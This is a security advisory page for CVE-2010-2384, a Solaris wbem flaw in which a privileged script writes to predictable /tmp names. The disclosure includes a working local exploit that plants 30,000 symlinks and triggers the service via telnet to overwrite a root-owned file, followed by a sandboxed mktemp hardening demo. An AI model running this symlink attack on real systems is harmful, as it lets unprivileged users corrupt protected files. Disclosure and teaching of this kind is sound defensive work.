| Reporter | Title | Published | Views | Family |
|---|---|---|---|---|
| | CVE-2010-2384 | 13 Jul 2010 00:00 | – | circl |
| | CVE-2010-2384 | 13 Jul 2010 22:07 | – | cve |
| | CVE-2010-2384 | 13 Jul 2010 22:07 | – | cvelist |
| | EUVD-2010-2394 | 7 Oct 2025 00:30 | – | euvd |
| | CVE-2010-2384 | 13 Jul 2010 22:30 | – | nvd |
| | Oracle Critical Patch Update Advisory - July 2010 | 13 Jul 2010 00:00 | – | oracle |
| Security | Oracle Critical Patch Update - July 2010 | 13 Jul 2010 00:00 | – | oracle |
| | Design/Logic Flaw | 13 Jul 2010 22:30 | – | prion |
| | Oracle Critical Patch Update Advisory - July 2010 | 15 Jul 2010 00:00 | – | securityvulns |
| | CVE-2010-2384: Solaris wbem unsafe use of temporary files | 20 Jul 2010 00:00 | – | securityvulns |
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Below is the full disclosure information for CVE-2010-2384. It was
reported to [email protected] on 3 January, 2010 and assigned Sun
bug 6913886.
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).
- ------
When the wbem service is enabled but hasn't been used before, it will run
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited
by an unprivileged local user like this:
$ id
uid=101(fstuart) gid=14(sysadmin)
$ cd /tmp
$ x=0
$ while [ "$x" -ne 30000 ] ;do
> ln -s /etc/important /tmp/dummy.$x
> x=$(expr "$x" + 1)
> done
$ ls -dl /etc/important
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important
$ cat /etc/important
This is an important file!
EOF
$ telnet localhost 898
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
^]
telnet> quit
Connection to localhost closed.
$ cat /etc/important
/<\/Scope>/ {
n
i\
<Folder TreeDisplay="false"> \
<Name>SUNWrmui Bootstrap Folder</Name> \
<Description>This a temporary folder to workaround a bug. It
should be deleted during install. But if you do see it in the toolbox
editor, do NOT delete it.</Description> \
<Icon>status_16.gif</Icon> \
<LargeIcon>status_32.gif</LargeIcon> \
</Folder>
}
SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be
exploited.
- ------
`
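
The weakness in the advisory is a privileged script writing to a guessable name under /tmp, which follows any symlink already planted there. As an added example (not code from the advisory, from SUNWrmui_reg.sh, or from Oracle's patch), the following contrasts that pattern with `mktemp`; the function names, the sandbox layout and the sample content are assumptions made for illustration, and everything runs inside a private directory the demo creates.

```shell
#!/bin/sh
# Added example (constructed): the predictable-name pattern the advisory
# describes, next to a hardened replacement. All paths stay inside a
# private sandbox directory created by the demo itself.

# Weak: the name is guessable (fixed prefix + PID), and '>' follows a
# symlink that another local user created there beforehand.
write_predictable() {    # $1 = temp dir, $2 = content
    printf '%s\n' "$2" > "$1/this_computer.$$"
}

# Hardened: mktemp picks an unpredictable name and creates the file
# exclusively with mode 0600, so an existing file or symlink is never
# reused. Prints the path it wrote to.
write_hardened() {       # $1 = temp dir, $2 = content
    f=$(mktemp "$1/this_computer.XXXXXX") || return 1
    printf '%s\n' "$2" > "$f"
    printf '%s\n' "$f"
}

# Demo: place a symlink at the predictable name, run one writer, and
# report whether the file behind the symlink was changed.
demo() {                 # $1 = predictable | hardened
    sandbox=$(mktemp -d) || return 2
    printf 'important\n' > "$sandbox/victim"      # constructed sample file
    mkdir "$sandbox/tmp"
    ln -s "$sandbox/victim" "$sandbox/tmp/this_computer.$$"
    "write_$1" "$sandbox/tmp" "scratch data" > /dev/null
    result=$(cat "$sandbox/victim")
    rm -rf "$sandbox"
    [ "$result" = "important" ] && echo intact || echo clobbered
}

demo predictable   # prints: clobbered
demo hardened      # prints: intact
```

For scripts that need several scratch files, creating one private directory with `mktemp -d` and removing it from a `trap ... EXIT` handler gives the same protection with a single cleanup point.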